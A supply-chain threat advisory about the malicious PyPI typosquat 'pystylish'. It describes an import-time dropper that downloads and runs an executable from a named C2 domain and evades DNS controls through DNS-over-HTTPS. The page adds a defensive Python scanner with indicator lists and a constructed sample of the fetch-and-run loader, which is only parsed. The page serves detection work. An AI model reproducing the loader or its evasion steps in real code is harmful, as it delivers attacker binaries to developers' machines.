Supply-chain threat intelligence

Incident detail

critical · pypi · typosquatting · osv

Malicious code in pystylish (PyPI)

pystylish

Risk score

92

AI summary

Indexed incident for pystylish (pypi).

Description

On import of pystylish, the package's __init__.py spawns a daemon thread that downloads a Windows executable from https://goy.mikoz.xyz/boh3.exe, writes it to %TEMP%/vcredist_x86.exe (disguised as the Microsoft Visual C++ runtime installer), and executes it via subprocess.Popen. The domain is unrelated to the package's stated purpose (a terminal color/fade library) and is not a publisher-controlled host. To evade local DNS controls, the loader resolves the C2 domain through DNS-over-HTTPS (Cloudflare 1.1.1.1/dns-query and dns.google/resolve), then connects to the resolved IP directly with a manually set Host header, so /etc/hosts entries and DNS sinkholes are bypassed. Error paths print a fake "Failed to connect to discord.com:80" message regardless of the actual destination, providing cover for the unrelated outbound traffic. The package is a typosquat/clone of the legitimate pystyle library by billythegoat356: the README still points at github.com/billythegoat356/pystyle while the package is published under the name pystylish, and the library API is copied verbatim from pystyle with the dropper appended. Any developer who installs and imports pystylish (including transitively) will silently fetch and run an attacker-controlled binary on Windows.

Clone of a legitimate package. During import, the code downloads and executes a malicious executable.
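The behaviour described above (network and process-spawning calls reachable at import time, DNS-over-HTTPS resolver strings, a disguise filename and a decoy error message) is cheap to triage statically before a package is ever imported. The script below is an added example written for this page, not ThreatPkg's tooling or the pystyle project's code; it walks the Python AST of an __init__.py, follows functions referenced from module level (including thread targets), and reports the indicators the advisory names. The indicator lists are taken from the advisory text; the two sample modules are constructed for the example and are only parsed, never executed.

```python
import ast
import pathlib
import re

# Indicators drawn from the advisory: the named C2 host, the DNS-over-HTTPS
# endpoints the loader used, the disguise filename and the decoy error string.
C2_HOSTS = ("goy.mikoz.xyz",)
DOH_ENDPOINTS = ("1.1.1.1/dns-query", "dns.google/resolve")
DISGUISE_FILENAMES = ("vcredist_x86.exe",)
DECOY_MESSAGES = ("Failed to connect to discord.com",)
EXE_URL_RE = re.compile(r"https?://[^\s'\"]+\.exe\b", re.IGNORECASE)

# Calls a terminal-colour library has no reason to make while being imported.
SUSPICIOUS_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call", "os.system",
    "os.startfile", "threading.Thread", "urllib.request.urlopen",
    "requests.get", "http.client.HTTPSConnection",
}


def _dotted(func):
    """Dotted name of a call target, e.g. 'subprocess.Popen', or None."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None


def _import_reachable(tree):
    """Yield AST nodes that execute on import: module-level statements plus the
    bodies of module-level functions referenced from them (a thread target is a
    reference too), followed transitively."""
    funcs = {n.name: n for n in tree.body if isinstance(n, ast.FunctionDef)}
    pending, seen = [], set()

    def visit(root):
        for node in ast.walk(root):
            yield node
            if isinstance(node, ast.Name) and node.id in funcs and node.id not in seen:
                seen.add(node.id)
                pending.append(funcs[node.id])

    for stmt in tree.body:
        if not isinstance(stmt, (ast.FunctionDef, ast.ClassDef)):
            yield from visit(stmt)
    while pending:
        yield from visit(pending.pop())


def scan_source(source):
    """Return sorted findings for one Python source text (e.g. an __init__.py)."""
    findings = set()
    for node in _import_reachable(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.add(f"import-time call: {name}")
            if name == "threading.Thread" and any(
                kw.arg == "daemon" and getattr(kw.value, "value", None) is True
                for kw in node.keywords
            ):
                findings.add("daemon thread created at import")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            s = node.value
            if EXE_URL_RE.search(s):
                findings.add(f"executable URL: {s}")
            findings.update(f"known C2 host: {h}" for h in C2_HOSTS if h in s)
            findings.update(f"DNS-over-HTTPS resolver: {e}" for e in DOH_ENDPOINTS if e in s)
            findings.update(f"disguise filename: {f}" for f in DISGUISE_FILENAMES if f in s)
            findings.update(f"decoy error message: {m!r}" for m in DECOY_MESSAGES if m in s)
    return sorted(findings)


def scan_tree(root):
    """Scan every .py file under root (e.g. a venv's site-packages); returns {path: findings}."""
    results = {}
    for path in pathlib.Path(root).rglob("*.py"):
        try:
            found = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            continue
        if found:
            results[str(path)] = found
    return results


# Constructed sample mirroring the loader shape the advisory describes. It is a
# string that is parsed only; nothing in it is run.
SUSPECT_INIT = '''
import os, subprocess, threading, urllib.request

def _fetch_and_run():
    try:
        url = "https://goy.mikoz.xyz/boh3.exe"
        ip = urllib.request.urlopen("https://1.1.1.1/dns-query?name=goy.mikoz.xyz").read()
        path = os.path.join(os.environ["TEMP"], "vcredist_x86.exe")
        subprocess.Popen([path])
    except Exception:
        print("Failed to connect to discord.com:80")

threading.Thread(target=_fetch_and_run, daemon=True).start()

def Colorate(text):
    return text
'''

# Constructed benign sample: a colour helper with no import-time side effects.
BENIGN_INIT = '''
import sys

def Colorate(text, color):
    return color + text + "\\033[0m"

def fade(text):
    return [Colorate(line, "\\033[32m") for line in text.splitlines()]
'''

if __name__ == "__main__":
    for label, src in (("suspect", SUSPECT_INIT), ("benign", BENIGN_INIT)):
        print(label, scan_source(src))
```

Because the walk starts from module-level statements, a dropper hidden inside a function that is only called on import is still reported, while the same calls inside an API function a user must invoke explicitly are not; that keeps the output focused on the import-time execution the advisory is about. Running scan_tree over a fresh virtualenv after installing an untrusted package is the practical use.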


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-pystylish

Reasons (based on the campaign):

  • Downloads and executes a remote executable.

  • malware

  • clones-real-package

Technical details

Affected versions

=2.9

Indicators

  • affected version = 2.9 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents